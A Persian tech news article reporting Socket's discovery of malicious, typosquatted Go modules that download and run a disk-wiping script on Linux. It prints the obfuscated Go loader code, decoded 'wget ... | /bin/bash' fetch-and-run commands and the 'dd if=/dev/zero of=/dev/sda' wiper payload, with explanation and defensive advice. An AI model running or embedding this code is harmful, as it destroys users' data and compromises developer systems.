• صفحه اصلی
  • همه اخبار
  • تبلیغات تکناک
  • درباره ما
  • تماس با ما
اخبار تکنولوژی روز جهان و ایران
  • فناوری
    • اخبار هوش مصنوعی
    • رباتیک
    • اینترنت و شبکه
    • شبکه های اجتماعی
    • هوافضا
    • معماری
    • ورزش
    • رویداد ها
    • دوربین دیجیتال
  • کامپیوتر و موبایل
    • موبایل و تبلت
    • لپ تاپ و کامپیوتر
    • اپلیکیشن موبایل
    • نرم افزار
    • سخت افزار
    • ساعت هوشمند
    • مانیتور
    • اسپیکر و هدفون
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
  • نقد و بررسی
    • بررسی موبایل و تبلت
    • کنسول بازی
    • بررسی لپ تاپ و کامپیوتر
    • قطعات کامپیوتر
    • نرم افزار
    • بررسی اسپیکر و هدفون
    • بررسی ساعت هوشمند
  • آموزش
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
    • آموزش هوش مصنوعی
    • سخت افزار
  • اخبار ارز دیجیتال
    • قیمت لحظه ای ارز دیجیتال
    • ماشین حساب ارز دیجیتال
    • آموزش ارز دیجیتال
  • علمی
    • سلامت و پزشکی
    • انرژی
    • فیزیک
    • شیمی
    • نجوم
    • ورزش
    • محیط زیست
    • باستان شناسی
  • کسب و کار
    • شرکت ها
    • بورس
    • مدیریت(پروژه، کسب و کار، منابع انسانی)
    • استارتاپ ها
    • دولت الکترونیک
    • رویداد کسب و کار
  • وسائل نقلیه
    • خودرو
    • دوچرخه
    • موتور سیکلت
    • قطار
    • هواپیما
  • بازی و سرگرمی
    • کنسول بازی های کامپیوتری
    • بازی های کامپیوتر
    • بازی کنسول
    • بازی موبایل
    • فیلم و سریال
  • چند رسانه ای
    • عکس
    • ویدئو
  • اخبار داخلی
    • دانش بنیان
    • دولت الکترونیک
    • رویداد داخلی
    • بازار
    • دانشگاه
No Result
مشاهده تمامی نتایج
اخبار تکنولوژی روز جهان و ایران
  • فناوری
    • اخبار هوش مصنوعی
    • رباتیک
    • اینترنت و شبکه
    • شبکه های اجتماعی
    • هوافضا
    • معماری
    • ورزش
    • رویداد ها
    • دوربین دیجیتال
  • کامپیوتر و موبایل
    • موبایل و تبلت
    • لپ تاپ و کامپیوتر
    • اپلیکیشن موبایل
    • نرم افزار
    • سخت افزار
    • ساعت هوشمند
    • مانیتور
    • اسپیکر و هدفون
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
  • نقد و بررسی
    • بررسی موبایل و تبلت
    • کنسول بازی
    • بررسی لپ تاپ و کامپیوتر
    • قطعات کامپیوتر
    • نرم افزار
    • بررسی اسپیکر و هدفون
    • بررسی ساعت هوشمند
  • آموزش
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
    • آموزش هوش مصنوعی
    • سخت افزار
  • اخبار ارز دیجیتال
    • قیمت لحظه ای ارز دیجیتال
    • ماشین حساب ارز دیجیتال
    • آموزش ارز دیجیتال
  • علمی
    • سلامت و پزشکی
    • انرژی
    • فیزیک
    • شیمی
    • نجوم
    • ورزش
    • محیط زیست
    • باستان شناسی
  • کسب و کار
    • شرکت ها
    • بورس
    • مدیریت(پروژه، کسب و کار، منابع انسانی)
    • استارتاپ ها
    • دولت الکترونیک
    • رویداد کسب و کار
  • وسائل نقلیه
    • خودرو
    • دوچرخه
    • موتور سیکلت
    • قطار
    • هواپیما
  • بازی و سرگرمی
    • کنسول بازی های کامپیوتری
    • بازی های کامپیوتر
    • بازی کنسول
    • بازی موبایل
    • فیلم و سریال
  • چند رسانه ای
    • عکس
    • ویدئو
  • اخبار داخلی
    • دانش بنیان
    • دولت الکترونیک
    • رویداد داخلی
    • بازار
    • دانشگاه
No Result
مشاهده تمامی نتایج
اخبار تکنولوژی روز جهان و ایران

تک ناک » کامپیوتر و موبایل » نرم افزار » کشف ماژول‌های مخرب Go با قابلیت پاک‌سازی کامل اطلاعات

کشف ماژول‌های مخرب Go با قابلیت پاک‌سازی کامل اطلاعات

امیرحسین یونس نوشته شده توسط امیرحسین یونس
جمعه 12 اردیبهشت 1404 - 23:20
در کامپیوتر و موبایل, نرم افزار
کشف ماژول‌های Go باقابلیت پاک‌سازی کامل اطلاعات
کپی لینکاشتراک گذاری در تلگراماشتراک گذاری در توییتر

تیم تحقیقاتی Socket در گزارش جدید خود از شناسایی ماژول‌های مخربی خبر داده که به‌طور خاص به سیستم‌های کاربران حمله کرده و هارد دیسک آن‌ها را به‌طور کامل پاک می‌کنند. این حملات از طریق ماژول‌های برنامه‌نویسی زبان Go انجام می‌شود که کدهایی را شامل می‌شوند که باعث تخریب کامل داده‌های سیستم می‌شوند.

به گزارش تکناک، اگر با زبان Go آشنا نیستید، باید بگوییم که Go یک زبان برنامه‌نویسی کامپایل‌شده است که توسط گوگل طراحی شده است. این زبان به‌دلیل پشتیبانی قوی از هم‌زمانی (انجام چندین کار هم‌زمان) و عملکرد خوبش محبوب است.

علاوه بر این، Go به فایل‌های اجرایی واحد کامپایل می‌شود که استقرار برنامه‌ها را بسیار ساده می‌کند. توسعه‌دهندگان اغلب Go را به‌دلیل خوانایی آسان و قابلیت استفاده بالا دوست دارند که این عامل به محبوبیت آن افزوده است.

نئووین می‌نویسد که اکوسیستم Go بسیار وسیع و باز است و ماژول‌های زیادی از مخازن عمومی مانند GitHub در دسترس هستند. دسترسی آسان به این ماژول‌ها و قابلیت دریافت کد به‌طور مستقیم از مخازن جذاب است، اما این ساختار خود چالش‌های امنیتی جدی ایجاد می‌کند. هیچ مرجع مرکزی وجود ندارد که قبل از قرار گرفتن ماژول‌ها برای استفاده در دسترس توسعه‌دهندگان، آن‌ها را بررسی کند.

این به این معنی است که توسعه‌دهندگان اغلب با ماژول‌های مشابه در GitHub مواجه می‌شوند که از نظر نام مشابه هستند اما توسط افراد مختلف ایجاد شده‌اند و این امر تشخیص اینکه کدام ماژول معتبر است را دشوار می‌کند.

این محیط بدون مرجع مرکزی و استاندارد نام‌گذاری واضح، آسیب‌پذیری زیادی در برابر تکنیک‌های typosquatting دارد. در این تکنیک، مهاجمان ماژول‌های مخربی با نام‌هایی مشابه با ماژول‌های معتبر ثبت می‌کنند تا در نگاه اول قابل اعتماد به‌نظر برسند و احتمال اینکه توسعه‌دهندگان به‌طور تصادفی کدهای مخرب را در پروژه‌های خود بگنجانند، افزایش یابد.

چنین تهدیدهایی در ماه گذشته نیز مشاهده شد، زمانی که تیم Socket سه ماژول مخرب Go را شناسایی کرد که از روش‌های مشابهی برای پنهان کردن ماهیت خود استفاده می‌کردند.

این ماژول‌ها به‌شرح زیر شناسایی شدند:

  • github[.]com/truthfulpharm/prototransform
  • github[.]com/blankloggia/go-mcp
  • github[.]com/steelpoor/tlsproxy

اگرچه این ماژول‌ها معمولی به‌نظر می‌رسیدند، اما کدی را شامل می‌شدند که به‌طور خاص برای برقراری ارتباط و دانلود برنامه‌های مخرب جهت اجرا بر روی دستگاه قربانی طراحی شده بود. اسکنرهای امنیتی Socket این اقدامات مشکوک را شناسایی کردند که تحقیقات دقیق‌تر را در پی داشت و دامنه کامل حمله فاش شد.

مهاجمان از یک ترفند هوشمندانه برای پخش قسمت‌هایی از دستورات در داخل آرایه‌ای از رشته‌ها استفاده کردند و سپس آن‌ها را به‌طور پویا بازسازی کردند. این روش، که به‌نام obfuscation مبتنی بر آرایه‌های رشته‌ای شناخته می‌شود، روشی است برای سخت‌تر کردن شناسایی کد مخرب از طریق جستجوهای ساده با کلمات کلیدی.

Go یک زبان برنامه‌نویسی کامپایل‌شده

در اینجا نمونه‌ای از کد obfuscated در یکی از ماژول‌ها، truthfulpharm/prototransform، آورده شده است:

func eGtROk() error {
DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
pBRPhsxN := runtime.GOOS == "linux"
bcbGOM := "/bin/sh"
vpqIU := "-c"
PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] + DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44]
if pBRPhsxN {
exec.Command(bcbGOM, vpqIU, PWcf).Start()
}

return nil
}

var GEeEQNj = eGtROk()

این اسکریپت ابتدا بررسی می‌کند که آیا کد روی یک سیستم لینوکس در حال اجرا است یا خیر. اگر چنین باشد، دستوری را با استفاده از قطعات موجود در آن آرایه رشته‌ای می‌سازد. این دستور سپس به شل سیستم داده می‌شود تا اجرا شود. از آنجا که این کد سیستم‌عامل را بررسی می‌کند، این حمله به‌طور خاص به سیستم‌های توسعه‌دهندگان یا سرورهای لینوکس هدف‌گذاری کرده است.

زمانی که آن رشته‌های درهم ریخته دوباره کنار هم قرار گرفتند، دستور تشکیل‌شده یک دستور ساده برای دانلود و اجرای اسکریپت به‌طور مستقیم بود:

# prototransform module payload
wget -O - [.]website/storage/de373d0df/a31546bf | /bin/bash &

# go-mcp module payload
wget -O - [.]icu/storage/de373d0df/a31546bf | /bin/bash &

# tlsproxy module payload
wget -O - [.]41/storage/de373d0df/ccd7b46d | /bin/sh &

این دستورات به سیستم می‌گویند که یک فایل از یک آدرس وب از راه دور با استفاده از wget بارگیری کرده و سپس بلافاصله محتوای آن فایل را به شل /bin/bash یا /bin/sh وارد کند تا آن را اجرا کند. این اتفاق به‌طور فوری رخ می‌دهد و فایل به‌طور استاندارد ذخیره نمی‌شود که این امر تجزیه و تحلیل یا مداخله پیش از انجام آسیب را دشوار می‌سازد.

آنچه که این حمله را به‌ویژه ویرانگر کرد، اسکریپتی بود که این دستورات دانلود و اجرا می‌کردند. این اسکریپت اغلب با نام done.sh شناخته می‌شد و فقط یک خط داشت که سرنوشت سیستم را تعیین می‌کرد:

#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync

این دستور از ابزار dd در لینوکس استفاده می‌کند. این دستور به dd می‌گوید که داده‌ها را از /dev/zero (یک منبع خاص سیستم که همیشه بایت‌های صفر را فراهم می‌کند) کپی کرده و آن‌ها را مستقیماً بر روی /dev/sda بنویسد. در بیشتر سیستم‌های لینوکس، /dev/sda نمایانگر هارد دیسک اصلی است که سیستم‌عامل در آن قرار دارد، همراه با هر داده‌ای که کاربر ذخیره کرده است – فایل‌ها، برنامه‌ها، همه چیز.

با نوشتن صفرهای بی‌پایان روی /dev/sda، این دستور تمام اطلاعات را از بین می‌برد و به‌طور غیرقابل بازگشتی داده‌ها را پاک می‌کند. نتیجه نهایی ویرانی کامل است. ساختار فایل سیستم نابود می‌شود، سیستم‌عامل حذف می‌شود و تمام داده‌ها برای همیشه از بین می‌روند. این یعنی تمام کارها متوقف می‌شود و علاوه بر مشکلات فنی، هزینه‌های بالای پاک‌سازی و آسیب به شهرت شرکت‌ها به همراه خواهد داشت.

برای حفاظت از خود در برابر این حملات، باید با دقت هر کدی که به پروژه خود اضافه می‌کنید، بررسی کنید. فقط به‌دلیل اینکه یک ماژول نام خوبی دارد یا در GitHub است، به آن اعتماد نکنید. باید از ابزارهای خودکار برای اسکن کد این کتابخانه‌ها استفاده کنید تا آسیب‌پذیری‌های شناخته‌شده و الگوهای مشکوک شناسایی شوند.

امیرحسین یونس

امیرحسین یونس

کارشناس ارشد محیط زیست، نویسنده حوزه تکنولوژی

مطالب مرتبط

زمانی که رم‌های DDR5 تقلبی وارد می‌ شوند؛ موج جدید کلاهبرداری در بازار سخت‌افزار
سخت افزار

زمانی که رم‌های DDR5 تقلبی وارد می‌ شوند؛ موج جدید کلاهبرداری در بازار سخت‌افزار

نوشته شده توسط مانی
22 اردیبهشت 1405
موفقیت آیفون ۱۷ عرضه آیفون ۱۸ را عقب انداخت
پیشنهاد سردبیر

موفقیت آیفون ۱۷ عرضه آیفون ۱۸ را عقب انداخت

نوشته شده توسط سید محمد برازنده
22 اردیبهشت 1405
آیفون تاشو با دو رنگ محدود عرضه می‌ شود
کامپیوتر و موبایل

آیفون تاشو با دو رنگ محدود عرضه می‌ شود

نوشته شده توسط سید محمد برازنده
22 اردیبهشت 1405
مقایسه دو ساختمان با لوگوهای Intel و Tesla در یک تصویر ترکیبی، نماد حضور دو غول فناوری در صنایع رایانش و خودروهای هوشمند.
سخت افزار

تولید تراشه AI6.5 تسلا به اینتل سپرده می‌شود

نوشته شده توسط تارخ ترهنده
22 اردیبهشت 1405
صفحه آبی مرگ، هدیه ویژه ویندوز 11 به رایانه‌های دل
سیستم عامل کامپیوتر

صفحه آبی مرگ، هدیه ویژه ویندوز ۱۱ به رایانه‌های دل

نوشته شده توسط سید محمد برازنده
22 اردیبهشت 1405
خبر بعدی
رونمایی از Ulefone Armor X32؛ گوشی مقاوم اقتصادی با دوربین دید در شب

گوشی Ulefone Armor X32 با دوربین دید در شب معرفی شد

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

آذرآنلاین آذرآنلاین آذرآنلاین

پیشنهادی

تصویر رندر iPhone 18 Pro در رنگ Deep Red شامل نمای پشت با ماژول دوربین سه‌گانه و فلش، و نمای جلو با نمایشگر تمام‌صفحه و طراحی Dynamic Island؛ متن iPhone 18 Pro in Deep Red در بالای تصویر دیده می‌شود

آیفون ۱۸ پرو احتمالاً با این رنگ خاص وارد بازار می‌شود

24 فروردین 1405 - به‌روزشده در 22 اردیبهشت 1405

راز واقعی عملکرد داروی دیابت کشف شد

20 اردیبهشت 1405

داغ‌ترین‌های روز

اسلحه پنهان ایران در تنگه هرمز رونمایی شد!

اسلحه پنهان ایران در تنگه هرمز رونمایی شد!

20 اردیبهشت 1405
این رایانه در ابعاد یک کارت اعتباری با ضخامت ۱ میلی‌متری ساخته می‌ شود

این رایانه عجیب فقط یک میلی‌متر ضخامت دارد

21 اردیبهشت 1405
چین از نخستین رایانه کوانتومی دوهسته‌ای جهان رونمایی کرد

چین از نخستین رایانه کوانتومی دوهسته‌ای جهان رونمایی کرد

21 اردیبهشت 1405
نسخه جدید لینوکس با انبوهی از پچ‌های تولیدشده توسط AI منتشر شد

نسخه جدید لینوکس با انبوهی از پچ‌های تولیدشده توسط AI منتشر شد

21 اردیبهشت 1405
لنوو از ربات رومیزی مجهز به پروژکتور رونمایی کرد

لنوو از ربات رومیزی مجهز به پروژکتور رونمایی کرد + ویدیو

21 اردیبهشت 1405
Technoc

دنیا با سرعتی خیره کننده به سمت تحقق رویاهایی می رود که تا دیروز دست نیافتنی و محال بود و بشر با گذر از دریایی از موانع یک به یک در حال تحقق آنها است.

ما در” تک ناک” تلاش می کنیم سهمی از انعکاس تحولات بی شمار فناوری و اخبار تکنولوژی داشته باشیم و در این کهکشان بی انتهای یافته های علمی و دانش محور محتوایی قابل اتکاء و اخباری موثق را از گوشه و کنار دنیا در اختیار علاقمندان و مخاطبان خود قرار دهیم.

ما را در شبکه های اجتماعی دنبال کنید

تازه‌ها

آپگرید بزرگ سولانا وارد فاز تست شد؛ Alpenglow در راه تغییر بازی

آپگرید بزرگ سولانا وارد فاز تست شد؛ Alpenglow در راه تغییر بازی

22 اردیبهشت 1405
مقاومت ۱.۵۰ دلاری ریپل؛ آیا XRP آماده صعود تا ۲.۸۰ دلار است؟

مقاومت ۱.۵۰ دلاری ریپل؛ آیا XRP آماده صعود تا ۲.۸۰ دلار است؟

22 اردیبهشت 1405
نخستین بالگرد هیدروژنی جهان در حال پرواز آزمایشی با سامانه پیشران الکتریکی و سلول سوختی هیدروژنی

پرواز عملیاتی موفق نخستین بالگرد هیدروژنی جهان

22 اردیبهشت 1405
زمانی که رم‌های DDR5 تقلبی وارد می‌ شوند؛ موج جدید کلاهبرداری در بازار سخت‌افزار

زمانی که رم‌های DDR5 تقلبی وارد می‌ شوند؛ موج جدید کلاهبرداری در بازار سخت‌افزار

22 اردیبهشت 1405

دسترسی سریع

  • فناوری
  • کامپیوتر و موبایل
  • نقد و بررسی
  • آموزش
  • ارز دیجیتال
  • علمی
  • کسب و کار
  • وسائل نقلیه
  • بازی و سرگرمی
  • چند رسانه ای
  • صفحه اصلی
  • همه اخبار
  • تبلیغات تکناک
  • درباره ما
  • تماس با ما

© Copyright 2025 Technoc.ir

No Result
مشاهده تمامی نتایج
  • فناوری
    • اخبار هوش مصنوعی
    • رباتیک
    • اینترنت و شبکه
    • شبکه های اجتماعی
    • هوافضا
    • معماری
    • ورزش
    • رویداد ها
    • دوربین دیجیتال
  • کامپیوتر و موبایل
    • موبایل و تبلت
    • لپ تاپ و کامپیوتر
    • اپلیکیشن موبایل
    • نرم افزار
    • سخت افزار
    • ساعت هوشمند
    • مانیتور
    • اسپیکر و هدفون
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
  • نقد و بررسی
    • بررسی موبایل و تبلت
    • کنسول بازی
    • بررسی لپ تاپ و کامپیوتر
    • قطعات کامپیوتر
    • نرم افزار
    • بررسی اسپیکر و هدفون
    • بررسی ساعت هوشمند
  • آموزش
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
    • آموزش هوش مصنوعی
    • سخت افزار
  • اخبار ارز دیجیتال
    • قیمت لحظه ای ارز دیجیتال
    • ماشین حساب ارز دیجیتال
    • آموزش ارز دیجیتال
  • علمی
    • سلامت و پزشکی
    • انرژی
    • فیزیک
    • شیمی
    • نجوم
    • ورزش
    • محیط زیست
    • باستان شناسی
  • کسب و کار
    • شرکت ها
    • بورس
    • مدیریت(پروژه، کسب و کار، منابع انسانی)
    • استارتاپ ها
    • دولت الکترونیک
    • رویداد کسب و کار
  • وسائل نقلیه
    • خودرو
    • دوچرخه
    • موتور سیکلت
    • قطار
    • هواپیما
  • بازی و سرگرمی
    • کنسول بازی های کامپیوتری
    • بازی های کامپیوتر
    • بازی کنسول
    • بازی موبایل
    • فیلم و سریال
  • چند رسانه ای
    • عکس
    • ویدئو
  • اخبار داخلی
    • دانش بنیان
    • دولت الکترونیک
    • رویداد داخلی
    • بازار
    • دانشگاه

© Copyright 2025 Technoc.ir